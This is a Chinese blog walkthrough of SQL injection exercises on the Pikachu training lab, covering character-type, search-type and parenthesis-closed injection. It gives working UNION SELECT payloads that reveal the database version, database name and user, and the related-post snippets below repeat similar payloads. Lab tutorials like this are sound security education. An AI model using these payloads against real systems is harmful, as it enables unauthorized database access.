SQL注入(pikachu)字符型注入和搜索型注入

已于 2022-03-07 22:58:02 修改
阅读量1.2k 收藏 3
点赞数
分类专栏: # pikachu靶场(sql) 文章标签: sql 数据库 database
于 2022-03-07 12:17:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_54431413/article/details/123320179
版权

一、字符型注入

1.判断column列数

注意:前面加上'进行闭合,中间是判断列数的sql语句,后面的注释掉

在url中要这么写

1'+union+select+1%2C2%23或者

1'+union+select+1,2--+

2.页面源文件代码

4.传入数据库的语句

(在源文件中用echo $query显示到页面中)

5.查看数据库名和版本号

 接下来注入语句和数字型类同。

二、搜索型注入

1.搜索型文件源码

2.注入语句:

1%' union select 1,2,3#

3.获取数据库版本,数据库名,和用户名

1%' union select version(),database(),user()#

得到结果如下:

 三、xx型注入

和上述方法类同

(1)注入语句:

12213')+union+select+1,2+%23

(2)查看数据库名称和用户

121321')+union+select+version(),database()+%23

得到结果,随后进行表名列名的查询

SQL注入——搜索型注入
zjdda的博客
05-30 7677
搜索型注入原理 语句构造
pikachu搜索型注入
weixin_43622525的博客
03-07 7117
目录 pikachu 简介 搭建 windows Docker SQL注入 搜索型注入 pikachu 简介 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。 搭建 windows 搭建phpstudy环境,将pikachu解压在网站根目录进行搭建。 Docker docker build -t "pikachu" . docker run
搜索注入
热门推荐
cnbird's blog
07-16 2万+
如果没有说错的话,在国内应该是lake2最早提出搜索型文本框注入的。这个问题我也是最近才搞明白的,因为上网时间少,工作又比较忙,所以很少时间来学习。以前很傻以为搜索型注入就是直接在文本框中输入and 1=1 and 1=2,结果每次都是出现同样的页面,说是什么没有找到你搜索的关键词,汗啊 曾经有个人就说过,中国的黑客满地都是啊;而且有一项调查显示,中国有超过50%的大学生想成为黑客,这也许就是
Pikachu靶场-SQL注入
最新发布
sucker的博客
04-21 1230
搜索型SQL注入发生在网站的搜索功能模块中,由于开发者未对用户输入进行有效过滤,导致攻击者可通过构造恶意输入篡改SQL查询逻辑。UPDATE注入发生在应用程序将用户输入直接拼接到UPDATE语句中,允许攻击者修改数据库中的现有数据,可能导致数据篡改、权限提升或信息泄露。SQL注入中的INSERT注入发生在应用程序将用户输入不安全地拼接到INSERT语句中时,允许攻击者操纵数据库操作。是一种需要特定闭合符号的SQL注入类型,其核心在于识别并绕过SQL语句中的闭合符号(如单引号或括号),从而构造恶意查询。
SQL注入系列之PHP+Mysql手动注入()----搜索型(POST/GET)
fendo
02-26 1万+
一、搜索型注入简介与原理 1)简介 一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在: 2)原理 $sql="select * from user where password like '%$pwd%' order by pa
mysql搜索型注入_SQL注入系列之PHP+Mysql手动注入()----搜索型(POST/GET)
weixin_39668965的博客
01-19 303
一、搜索型注入简介与原理1)简介一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在:其中又分为POST/GET,GET型的一般是用在网站上的搜索,而POST则用在用户名的登录,可以从form表单的method="get"属性来区分是get还是post。搜索型注入又称为文本框注入...
SQL注入搜索型注入
07-22 2829
SQL语句selectusername,idfromadminwhereusernamelike'%$name%'"%"匹配任何字符,"like"的意思就是像,"$"变量。正常回显,却无法判断字段数,也无法查看报错位。数据库表的信息(blog,heroes,movies,进入靶场后出现此界面,在登录界面输入。8页面显示不正常,发现最大正常位是。数据库列的信息id,num,判断一下是数字型还是字符型。账号密码错误或用户未注册!搜索框内输入a正常回显。...
pikachu SQL注入搜索型
ANYOUZHEN的博客
05-09 275
观察后端代码,尝试构造合法闭合 payload:xxxx%' or 1=1# 成功注入,#在MySQL数据库中起到注释的作用,可以去掉后面的代码
SQL注入:数字型、字符型搜索型
qq_38719025的博客
03-11 5831
一、注入点的判断 对连接[http://10.0.0.26:8080/Less-2/?id=1]是否是注入点进行判断。 1、变换id 参数 当我们变换id 参数(2+1|2-1)的时候,发现同一个页面,页面展现出不同的内容。也就是说,数据库中的内容会回显到网页中来。 初步判定,id 参数会带入数据库查询,根据不同的id 查询数据库,得到不同的内容。 猜测后台执行的SQL 语句大致结构为: select * fro...
pikachu靶场-字符型注入
yjh20041010的博客
12-02 559
免责声明:工具本身并无好坏,希望大家以遵守《网络安全法》相关法律为前提来使用该工具,支持研究学习,切勿用于非法犯罪活动,对于恶意使用该工具造成的损失,本人及开发者无关。我们可以看到页面中有输入框所以我们不需要再url里输入代码,直接再输入框中执行就可以。我们得到了数据库版本号分别是'pikachu','5.5.53'我们现在已知这个是字符型注入所以我们不用确定他的类型了,使用联合查询内置表来爆破数据库名,表名,字段名。我们看到了表名users继续查看字段名。我们得到了用户名密码,至此通关。
pikachu字符型注入
2301_79595769的博客
12-23 1071
这里还是很常规的爆比较重要的是数字型字符型间的判断了字符型注入注入的参数为字符型(char),判断依据与数字型大致相同,不同的是,判断字符型注入需要先闭合' '。一般的后台sql语句是:在字符型注入里,最重要的就是闭合输入1回显成功输入1’回显异常,是语法错误输入1 and 1=1 回显成功输入1 and 1=2仍是回显成功这是因为这里的参数是int型的查阅资料得知,数据库中id的数据类型设置为int(数值类型)就会出现这种情况。
pikachu靶场的字符型注入(get)
ranioe的博客
12-08 3803
pikachu靶场字符型注入(get) 字符型注入 先找一个可以正确返回的内容 判断闭合条件 查询vince’报错 查询vince”没有报错 则说明是使用’闭合的。 把vince’构造可满足放回正确内容的语句 把vince’构造可满足放回正确内容的语句,在这个过程中可以利用and 1=1 and 1=2 去判断是否构造成功 and 1=1 返回正常,and 1=2 查询不到用户。则说明构造成功了 查询字段数 查字段是否为2时,没有报错,查字段数是否为3时,报错。则说明字段数为2 查询回显位 语
SQL注入字符型注入练习(pikachu
windStudyer的专栏
04-17 3927
SQL注入字符型 实现目标:获取到pikachu下的表、数据信息 靶场:pikachu =》sql-inject=》字符型注入 实验步骤 第一步目标:拿到数据库名 确定请求方法类型 注:为什么需要确定请求方法??自己思考 尝试输入数据,判断请求方法类型 从上可以看出,请求的方法为get类型,注入点在url上边,我们输入的要查询的值是abc,实际被是通过url参数name带入的。而且参数是字符型。 判断注入点 从2.1知道请求方法注入类型,因为是字符..
Pikachu搜索型注入
xdjxi的博客
03-07 911
一、原理 “%”匹配任何字符,“like”的意思就是像,这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。 构造对应的闭合,闭合前面的单引号百分号,注释后面的百分号单引号。构造的payload如下 xxxx%’ or 1=1# 二、操作 打开进入界面: 然后我们可以输入’ and 1=1 order by x#通过order by x来确定字段数,时返回了正常页面然后我们可以输入’ and 1...
pikachu 漏洞平台sql注入搜索型注入
安全界的彭于晏的博客
06-26 619
http://192.168.66.4/pikachu/vul/sqli/sqli_search.php?name=&submit=%E6%90%9C%E7%B4%A2 随便搜一下得到URL 找找闭合 判断一下是否存在注入 加了 ’ 之后报出数据库错误 说明执行了 数据库查询语句 构造PAylodad 先查一下主查询字段数 1、找闭合 看下报错信息 这里有个百分号 加个百分号试一下 到4报错 看来 是有三个主查询字段 构造payload union select database
pikachu之字符串注入注入意义)
white_or_abc的博客
12-21 570
首先打开pikachu,然后进入字符串注入中,上面的问题是what’s your username?,判断此处命令的判断根据是id或者username,其实不重要,此处要猜测一下此处的语句就行,根据一个username判断内容的语句基本是 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 但是,在以前的写作业时,写上的答案是 kobe'and 1=1# $sql="SELECT * FROM users WHERE id='kobe'and 1
pikachu靶场sql注入字符型
01-15
### Pikachu靶场中的SQL注入字符型攻击方法 在Pikachu靶场中,字符型SQL注入是一种常见的漏洞利用形式。当应用程序未能正确过滤用户输入并将其直接拼接到SQL语句中执行时,就可能发生这种类型的攻击。 对于字符型SQL注入,在`http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=vince%22&submit=%E6%9F%A5%E8%AF%A2`这个URL中,参数`name`是一个字符串类型的数据[^2]。如果该参数未被适当处理,则可以通过构造特定的输入来操纵后台SQL查询逻辑。 #### 构造恶意请求 假设存在如下SQL查询: ```sql SELECT * FROM users WHERE username='vince"' ``` 通过向`name`参数附加特殊字符(如单引号),可以改变原有SQL语句结构,从而实现不同目的的操作。例如,尝试闭合当前条件并通过OR子句绕过验证: ```bash http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=vince'%20or%20'1'%3D'1 ``` 这会使得最终形成的SQL变为: ```sql SELECT * FROM users WHERE username='vince' or '1'='1' ``` 上述操作将返回所有符合条件的结果集而不是仅限于指定用户的记录。 #### 获取更多信息 为了进一步探索数据库内部情况,可采用联合查询的方式提取额外数据。比如想要知道当前使用的MySQL版本信息,可以在原基础上追加UNION SELECT语句: ```bash http://127.0.0.1/pikchu/vul/sqli/sqli_str.php?name=vince'%20union%20select%20@@version--+ ``` 此命令将会把服务器端运行环境下的MySQL版本展示出来。 需要注意的是,实际渗透测试过程中应当遵循合法授权范围内的活动准则,并且只针对允许测试的目标实施此类技术研究。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅_花_七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值